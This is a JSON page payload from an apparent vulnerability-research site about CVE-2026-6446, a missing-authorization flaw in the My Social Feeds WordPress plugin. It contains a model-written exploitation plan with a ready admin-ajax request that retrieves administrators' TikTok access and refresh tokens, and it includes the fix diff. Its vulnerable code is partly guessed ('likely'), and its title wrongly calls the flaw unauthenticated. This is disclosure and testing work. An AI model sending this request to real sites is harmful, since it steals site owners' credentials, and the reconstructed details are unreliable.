[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fANyFmY2dIudf1vcLPN7oWxXXDB7x83DmVG5PBOmcGqU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-6446","my-social-feeds-missing-authorization-to-unauthenticated-sensitive-information-exposure-via-ttpgetaccounts-ajax-action","My Social Feeds \u003C= 1.0.4 - Missing Authorization to Unauthenticated Sensitive Information Exposure via 'ttp_get_accounts' AJAX Action","The My Social Feeds – Social Feeds Embedder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to and including 1.0.4 via the 'ttp_get_accounts' AJAX action. This is due to the complete absence of authorization checks (no capability verification) and nonce verification in the get_accounts() function, which returns the full contents of the 'ttp_tiktok_accounts' WordPress option. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve sensitive TikTok OAuth credentials, including access_token and refresh_token values, that belong to administrator-connected TikTok accounts, enabling them to impersonate the site owner when interacting with the TikTok API.","my-social-feeds",null,"\u003C=1.0.4","1.0.5","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Insufficiently Protected Credentials","2026-05-01 00:00:00","2026-05-02 04:27:46",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd46d6493-8b89-4258-9d83-79e5946cd76f?source=api-prod",1,[22,23,24,25,26,27,28,29],"build\u002Fadmin-dashboard.asset.php","build\u002Fadmin-dashboard.js","build\u002Ftiktok-player\u002Findex.asset.php","build\u002Ftiktok-player\u002Findex.js","build\u002Ftiktok-player\u002Fview.asset.php","build\u002Ftiktok-player\u002Fview.js","includes\u002FTiktokAPI.php","languages\u002Fmy-social-feeds-en_US.po","researched",false,3,"# Exploitation Research Plan - CVE-2026-6446\n\n## 1. Vulnerability Summary\nThe **My Social Feeds** plugin (up to version 1.0.4) contains a sensitive information exposure vulnerability via its AJAX handler for the `ttp_get_accounts` action. The `get_accounts()` function in the `TTPTiktokAPI` class lacks both capability checks (`current_user_can`) and nonce verification (`check_ajax_referer`). This allows any authenticated user, including those with **Subscriber** privileges, to retrieve the full contents of the `ttp_tiktok_accounts` WordPress option, which contains TikTok OAuth credentials (`access_token`, `refresh_token`, and `open_id`).\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `ttp_get_accounts`\n- **HTTP Method**: `POST` or `GET` (AJAX actions typically support both, but `POST` is standard).\n- **Authentication**: Required (Subscriber level or higher).\n- **Vulnerable Parameter**: None (the action itself triggers the data dump).\n- **Payload**: `action=ttp_get_accounts`\n\n## 3. Code Flow\n1. **Entry Point**: The plugin registers the AJAX action in `includes\u002FTiktokAPI.php`:\n   ```php\n   add_action('wp_ajax_ttp_get_accounts', [$this, 'get_accounts']);\n   ```\n   *Note: There is no corresponding `wp_ajax_nopriv_ttp_get_accounts`, confirming authentication is required.*\n2. **Sink**: The `get_accounts()` function (located in `includes\u002FTiktokAPI.php` at approximately line 156) is called.\n3. **Execution**: In the vulnerable version (1.0.4), the function likely reads the option and returns it directly:\n   ```php\n   public function get_accounts() {\n       \u002F\u002F Vulnerable version lacks: if (!current_user_can('manage_options')) return;\n       \u002F\u002F Vulnerable version lacks: check_ajax_referer('...', '...');\n       $accounts = get_option('ttp_tiktok_accounts', []);\n       wp_send_json_success($accounts);\n   }\n   ```\n4. **Data Leak**: The `ttp_tiktok_accounts` option stores an associative array where keys are TikTok `open_id`s and values include `access_token` and `refresh_token`.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the `get_accounts()` function **completely lacks nonce verification**. Therefore, no nonce is required to exploit this endpoint. \n\nIf testing reveals a nonce is required (i.e., the description was inaccurate), the nonce would typically be generated in `build\u002Fadmin-dashboard.js` and localized. However, based on the `PR:L` severity and the \"Missing Authorization\" description, the exploit should succeed with just a valid Subscriber session.\n\n## 5. 
Exploitation Strategy\n### Step-by-Step Plan:\n1. **Authentication**: Log in as a Subscriber-level user to obtain a session cookie.\n2. **Execution**: Send a `POST` request to `admin-ajax.php` with the `action` parameter set to `ttp_get_accounts`.\n3. **Capture**: Parse the JSON response to extract TikTok credentials.\n\n### Required HTTP Request:\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [Subscriber Cookies]\n\naction=ttp_get_accounts\n```\n\n## 6. Test Data Setup\nTo verify the leak, mock data must exist in the database. Use WP-CLI to seed the sensitive option:\n\n```bash\n# Seed the TikTok accounts option with dummy sensitive data\nwp option update ttp_tiktok_accounts '{\n    \"test_open_id_123\": {\n        \"account_id\": \"test_open_id_123\",\n        \"display_name\": \"Attacker Target\",\n        \"access_token\": \"SENSITIVE_ACCESS_TOKEN_XYZ_999\",\n        \"refresh_token\": \"SENSITIVE_REFRESH_TOKEN_ABC_111\",\n        \"expires_at\": 1999999999\n    }\n}' --format=json\n```\n\n## 7. Expected Results\nA successful exploit will return a `200 OK` response with a JSON body:\n```json\n{\n    \"success\": true,\n    \"data\": {\n        \"test_open_id_123\": {\n            \"account_id\": \"test_open_id_123\",\n            \"display_name\": \"Attacker Target\",\n            \"access_token\": \"SENSITIVE_ACCESS_TOKEN_XYZ_999\",\n            \"refresh_token\": \"SENSITIVE_REFRESH_TOKEN_ABC_111\",\n            \"expires_at\": 1999999999\n        }\n    }\n}\n```\n\n## 8. Verification Steps\n1. **Observe Output**: Verify the returned JSON contains the `access_token` and `refresh_token` seeded in Step 6.\n2. **Access Control Check**: Attempt the same request without a cookie to ensure `wp_ajax_` correctly blocks unauthenticated requests (returning `400` or `0`).\n3. 
**Privilege Check**: Confirm the user used for exploitation has only the `subscriber` role:\n   ```bash\n   wp user get \u003Cusername> --field=roles\n   ```\n\n## 9. Alternative Approaches\nIf the `ttp_get_accounts` endpoint is somehow blocked, examine `ttp_tiktok_videos` (registered for `nopriv`):\n```php\nadd_action('wp_ajax_ttp_tiktok_videos', [$this, 'get_videos']);\nadd_action('wp_ajax_nopriv_ttp_tiktok_videos', [$this, 'get_videos']);\n```\nCheck if `get_videos` leaks the account info in its response or through error messages if an invalid `open_id` is provided. However, `get_accounts` is the primary and direct target for this CVE.","The My Social Feeds plugin for WordPress is vulnerable to sensitive information exposure due to a missing authorization check on its 'ttp_get_accounts' AJAX action. Authenticated attackers, including those with Subscriber-level privileges, can exploit this to retrieve sensitive TikTok OAuth tokens (access and refresh tokens) stored in the WordPress options table.","\u002F\u002F includes\u002FTiktokAPI.php\n\n\u002F\u002F Line 25\nadd_action('wp_ajax_ttp_get_accounts', [$this, 'get_accounts']);\n\n\u002F\u002F ...\n\n\u002F\u002F Line 156\npublic function get_accounts() {\n    $accounts = get_option('ttp_tiktok_accounts', []);\n    wp_send_json_success($accounts);\n}","--- includes\u002FTiktokAPI.php\n+++ includes\u002FTiktokAPI.php\n@@ -156,5 +156,8 @@\n \n     public function get_accounts() {\n+        if ( ! current_user_can( 'manage_options' ) ) {\n+            wp_send_json_error( 'Unauthorized' );\n+        }\n         $accounts = get_option('ttp_tiktok_accounts', []);\n         wp_send_json_success($accounts);\n     }","To exploit this vulnerability, an attacker needs a valid login session on the WordPress site (Subscriber level or higher). The attacker sends a request to the \u002Fwp-admin\u002Fadmin-ajax.php endpoint with the action parameter set to 'ttp_get_accounts'. 
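Review bot: the hunk on get_accounts() adds only the capability check, while the advisory text attributes the flaw to the absence of both capability and nonce verification; add check_ajax_referer( 'ttp_nonce', 'nonce' ) ahead of the current_user_can() test (the nonce action and field names here are placeholders, the plugin's real ones are not visible on this page) so that a logged-in administrator's browser cannot be made to issue this request from another origin. The error branch should also carry a status code, e.g. wp_send_json_error( 'Unauthorized', 403 ), so that the denial is not served as a 200 and is visible in access logs as a 403. wp_send_json_error() terminates the request through wp_die(), so the missing return after it is not a control-flow defect as written, but an explicit return keeps the early exit obvious if the AJAX die handler is ever filtered.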
Because the plugin fails to verify user capabilities or nonces for this action, it returns the full contents of the 'ttp_tiktok_accounts' option, which includes sensitive TikTok OAuth credentials (access_token, refresh_token, and open_id) belonging to the site administrator.","gemini-3-flash-preview","2026-05-04 17:37:06","2026-05-04 17:37:37",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.0.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmy-social-feeds\u002Ftags\u002F1.0.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmy-social-feeds.1.0.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmy-social-feeds\u002Ftags\u002F1.0.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmy-social-feeds.1.0.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmy-social-feeds\u002Ftags"]